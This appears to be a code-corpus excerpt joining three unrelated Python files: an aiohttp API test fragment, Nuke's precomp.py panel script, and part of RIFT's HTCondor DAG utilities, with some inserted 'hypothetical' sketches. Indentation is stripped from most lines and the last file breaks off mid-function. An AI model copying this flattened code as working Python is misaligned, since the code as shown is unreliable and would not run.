resp_json = await resp.json()
assert resp_json["message"] == "Topic does not exist"
async def test_topic_message_empty(self, cli, topic):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert type(resp_json) == list
assert len(resp_json) == 0
async def test_topic_message(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages
assert len(resp_json) == 3
async def test_topic_message_offset(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:]
assert len(resp_json) == 2
async def test_topic_message_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?count=2" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[:2]
assert len(resp_json) == 2
async def test_topic_message_offset_and_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1&count=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:2]
assert len(resp_json) == 1
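# --- Hypothetical standalone sketch (not part of the original test module) ---
# Shows the same request flow the fixtures above exercise, but against a locally
# served instance of make_app(); useful for manual smoke testing without pytest.
# The /topic endpoint comes from the tests; the host, port, and helper name are assumptions.
async def _smoke_test(host="127.0.0.1", port=8080):
    import aiohttp
    from aiohttp import web
    app = make_app()
    runner = web.AppRunner(app)
    await runner.setup()
    site = web.TCPSite(runner, host, port)
    await site.start()
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get("http://%s:%d/topic" % (host, port)) as resp:
                print(resp.status, await resp.json())
    finally:
        await runner.cleanup()

if __name__ == "__main__":
    asyncio.run(_smoke_test())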
d04c8eff07c31a44f0aef8503a211c69268b39fd | 8,889 | py | Python | nuke_stubs/nukescripts/precomp.py | sisoe24/Nuke-Python-Stubs @ 79c53cf5cb7b38e15a34fd04f672b143d9d7dc85 | ["MIT"] | 1 star (2022-01-12)
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
import nuke
import os, re, sys, math, time
from nukescripts import execute_panel
from nukescripts import panels
class PrecompOptionsDialog( panels.PythonPanel ):
def __init__( self ):
panels.PythonPanel.__init__( self, "Precomp Nodes", "uk.co.thefoundry.PrecompOptionsDialog" )
self.scriptPath = nuke.File_Knob( "script", "Precomp script path " )
self.renderPath = nuke.File_Knob( "render", "Precomp render path " )
self.channels = nuke.Channel_Knob( "channels", "Channels " )
self.origNodes = nuke.Enumeration_Knob( "orig", "Original nodes ", ["add backdrop", "delete", "no change" ] )
self.addKnob ( self.scriptPath )
self.addKnob ( self.renderPath )
self.addKnob ( self.channels )
self.addKnob ( self.origNodes )
self.channels.setValue('all')
defaultDir = nuke.Root()['name'].value()
if defaultDir and defaultDir != "":
defaultDir = os.path.dirname( defaultDir )
if not defaultDir.endswith("/"):
defaultDir += "/"
else:
defaultDir = ""
basename = findNextName("Precomp")
self.scriptPath.setValue( defaultDir + basename + "_v01.nk" )
self.renderPath.setValue( defaultDir + basename + ".####.exr" )
self.setMinimumSize( 420, 50 )
class PrecompOptions:
def __init__(self):
self.scriptPath = ""
self.renderPath = ""
self.channels = ""
self.addBackdrop = False
self.delete = False
def askUserForOptions(self):
p = PrecompOptionsDialog()
result = p.showModalDialog()
if result:
self.scriptPath = p.scriptPath.value()
self.renderPath = p.renderPath.value()
self.channels = p.channels.value()
if p.origNodes.value() == "delete":
self.delete = True
elif p.origNodes.value() == "add backdrop":
self.addBackdrop = True
if nuke.env['nc']:
nukeExt = ".nknc"
      elif nuke.env['indie']:
nukeExt = ".nkind"
else:
nukeExt = ".nk"
(root, ext) = os.path.splitext(self.scriptPath)
if not ext:
self.scriptPath += nukeExt
elif ext == ".nk" and ext != nukeExt:
self.scriptPath = self.scriptPath[0:-3] + nukeExt
(root,ext) = os.path.splitext(self.renderPath)
if not ext:
self.renderPath += ".exr"
if os.path.exists(self.scriptPath):
if not nuke.ask("Overwrite existing " + self.scriptPath + " ?"):
return False
return True
else:
return False
def precomp_open(precomp):
precomp.executePythonCallback(nuke.PRECOMP_CALLBACK_OPENED)
nuke.Root().setModified( True )
nuke.scriptOpen(precomp["file"].evaluate())
def precomp_render(precomp):
reading = precomp["reading"].getValue()
precomp["reading"].setValue( False )
try:
finalNode = None
if precomp['useOutput'].value() == True:
finalNode = nuke.toNode( precomp['output'].value() )
else:
if precomp.output() and precomp.output().input(0):
finalNode = precomp.output().input(0)
execute_panel( [ finalNode ] )
except RuntimeError as e:
    if str(e)[0:9] != "Cancelled": # TO DO: change this to an exception type
raise
return
precomp["reading"].setValue( True )
def findNextName(name):
i = 1
while nuke.toNode ( name + str(i) ) != None:
i += 1
return name + str(i)
def precomp_copyToGroup(precomp):
## group context is set to precomp, so back up one level.
nuke.endGroup()
g = nuke.nodes.Group()
with precomp:
nuke.selectAll()
nuke.nodeCopy ( '%clipboard%' )
with g:
nuke.nodePaste( '%clipboard%' )
for k in ['label', 'icon', 'indicators', 'tile_color', 'disable']:
v = precomp[k].value()
if v:
g[k].setValue( v )
for k in precomp.allKnobs():
if isinstance( k, nuke.Link_Knob ):
lnk = nuke.Link_Knob( k.name() )
lnk.setLink( k.getLink() )
g.addKnob( lnk )
def precomp_selected():
nodes = nuke.selectedNodes()
if len(nodes) == 0:
g = nuke.createNode( "Precomp" )
return
options = PrecompOptions()
if not options.askUserForOptions():
return False
sel = nodes[0]
## select upstream nodes
if len( nodes ) == 1:
upstreamNodes = nuke.dependencies( nodes )
while len ( upstreamNodes ) != 0:
nodes += upstreamNodes
upstreamNodes = nuke.dependencies( upstreamNodes )
left = right = nodes[0].xpos()
top = bottom = nodes[0].ypos()
nodeSize = 100
titleHeight = 50
inputs = []
for n in nodes:
n["selected"].setValue ( True )
if n.xpos() < left:
left = n.xpos()
if n.xpos() > right:
right = n.xpos()
if n.ypos() < top:
top = n.ypos()
if n.ypos() > bottom:
bottom = n.ypos()
for i in range( 0, n.inputs() ):
if not n.input(i):
continue
if not n.input(i) in nodes:
inputs.append( n.input(i) )
## find all the dependent nodes
inputDeps = []
expressionDeps = []
for n in nodes:
for d in nuke.dependentNodes( nuke.INPUTS, [n]):
if d not in nodes:
if d.Class() != 'Viewer':
inputIndices = [i for i in range(d.inputs()) if d.input(i) == n]
inputDeps.append( (d, inputIndices) )
for d in nuke.dependencies( [n], nuke.EXPRESSIONS ):
if d not in nodes:
expressionDeps.append( d )
if len(inputDeps) > 1:
nuke.message( "You cannot precomp the selected nodes because there are multiple outputs." )
return
addLinkedExpressionNodes = False
if len(expressionDeps) > 0:
addLinkedExpressionNodes = nuke.ask( "Warning: The selected nodes have expressions to nodes outside the precomp. Do you want to copy these nodes to the precomp?" )
## make group and export
if len( nodes ) == 1 and nodes[0].Class() == "Group":
group = nodes[0]
else:
group = nuke.makeGroup( False )
with group:
outputInputs = []
output = group.output()
for i in range(0, output.inputs()):
outputInputs.append( output.input(i) )
## insert write node or use existing one
outInp = output.input(0)
if outInp is None or outInp.Class() != "Write":
w = nuke.createNode( "Write", inpanel = False)
w.setInput( 0, None )
else:
w = outInp
for i in range(0, len(outputInputs) ):
w.setInput( i, outputInputs[i] )
output.setInput(i, None )
output.setInput(0, w )
w.knob("file").setValue( options.renderPath )
type = os.path.splitext( options.renderPath)[1][1:].lower()
w.knob("file_type").setValue( type )
w.knob("channels").setValue( options.channels )
for n in nuke.allNodes():
n['selected'].setValue( False )
if addLinkedExpressionNodes:
for n in nuke.allNodes():
n['selected'].setValue( False )
for n in expressionDeps:
n['selected'].setValue( True )
nuke.nodeCopy ( '%clipboard%' )
with group:
nuke.nodePaste( '%clipboard%' )
writeOk = True
with group:
try:
nuke.tcl("export_as_precomp", options.scriptPath)
except:
nuke.message( "Could not write precomp script, permission denied, please specify a different \'script path\' and try again.")
writeOk = False
for n in nuke.selectedNodes():
n['selected'].setValue( False )
if group != nodes[0]:
group['selected'].setValue( False )
nuke.delete( group )
if not writeOk:
for n in nuke.selectedNodes():
n['selected'].setValue( False )
for n in nodes:
n['selected'].setValue( True )
return
## reload saved out script
g = nuke.createNode( "Precomp" )
g[ "file" ].setValue( options.scriptPath )
#nuke.tprint( "Selected Node: " + sel.name() )
for d in inputDeps:
node = d[0]
for inp in d[1]:
#nuke.tprint ( "Reconnecting dep " + node.name() + " input " + str(inp) )
node.setInput(inp, g)
## reconnect inputs, if any
for i in range(0, len(inputs)):
#nuke.tprint ( "Reconnecting input " + inputs[i].name() + " " + str(i) )
g.setInput(i, inputs[i] )
pad = 5
if options.addBackdrop:
b = nuke.createNode( "BackdropNode", inpanel = False )
width = int(math.fabs(right - left)) + (pad * 2) + nodeSize
height = int(math.fabs(bottom - top)) + ( pad * 2 ) + nodeSize + titleHeight
b['label'].setValue( os.path.basename( options.scriptPath ) )
b['note_font_size'].setValue( 18 )
b.setXYpos( left - pad * 2, top - ( pad * 2) - titleHeight )
b.knob( "bdwidth" ).setValue( width )
b.knob( "bdheight").setValue( height )
b.knob( "z_order" ).setValue( 0 )
b['selected'].setValue(False)
g.setXYpos( b.xpos() + width/2 - nodeSize/2, b.ypos() + height + pad * 2 )
elif options.delete:
for n in nodes:
nuke.delete( n )
if len(inputs) > 0:
nuke.message( "Warning: The precomp script requires inputs and may not render the same independent of its parent script." )
return group
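# Hypothetical registration sketch (not part of the original precomp.py): how
# precomp_selected above is typically bound to a menu item; Nuke normally does this
# from its own menu.py. The menu path and label here are assumptions.
def _example_register_precomp_menu_item():
  nuke.menu("Nuke").addCommand("Edit/Node/Precomp Selected (example)", precomp_selected)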
71db7646b48f42a2dbbfeaf06ad12d63c39123bf | 72,149 | py | Python | MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py | spfanning/research-projects-RIT @ 34afc69ccb502825c81285733dac8ff993f79503 | ["MIT"] | 8 stars / 7 issues / 11 forks (2019-2022)
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <evano@gravity.phys.uwm.edu>, Chris Pankow <pankow@gravity.phys.uwm.edu>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
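# NOTE: the which() helper referenced by the comment above (and called throughout the
# writers below) does not appear in this excerpt; a minimal reconstruction based on the
# cited snippet is sketched here. Treat it as an assumption about the stripped original.
def which(program):
    """Return the full path of 'program' if it is on $PATH and executable, else None."""
    def is_exe(fpath):
        return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
    fpath, fname = os.path.split(program)
    if fpath:
        if is_exe(program):
            return program
    else:
        for path in os.environ["PATH"].split(os.pathsep):
            exe_file = os.path.join(path.strip('"'), program)
            if is_exe(exe_file):
                return exe_file
    return None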
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
    return md5((t + r).encode()).hexdigest()  # hashlib requires bytes under python3
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each time.
return ile_job, ile_sub_name
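# --- Hypothetical usage sketch (not part of the original dag_utils.py) ---
# Illustrates how the (job, sub-file name) pair returned above is typically attached
# to a glue.pipeline DAG, one node per event, supplying the macros referenced in the
# submit file. All argument values below are placeholders, not RIFT defaults.
def _example_build_ile_grid_dag(n_events=4):
    dag = pipeline.CondorDAG(log="ile_grid.log")
    dag.set_dag_file("ile_grid")
    ile_job, _ = write_integrate_likelihood_extrinsic_grid_sub(
        tag="integrate",
        exe="/usr/bin/true",              # placeholder executable
        log_dir="logs/",
        psd_file=["H1=psd.xml.gz"],       # placeholder PSD spec
        channel_name=["H1=FAKE-STRAIN"])  # placeholder channel spec
    for event in range(n_events):
        node = pipeline.CondorDAGNode(ile_job)
        node.add_macro("macroevent", event)    # consumed by --event
        node.add_macro("macromassid", event)   # appears in the log-file template
        dag.add_node(node)
    ile_job.write_sub_file()
    dag.write_dag()
    return dag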
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to plot posterior contours from coalesced ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching triplot jobs (make_triplot) on coalesced ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching 1D cumulative posterior postprocessing jobs on coalesced ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each time.
return ile_job, ile_sub_name
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Perform puffball calculation
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
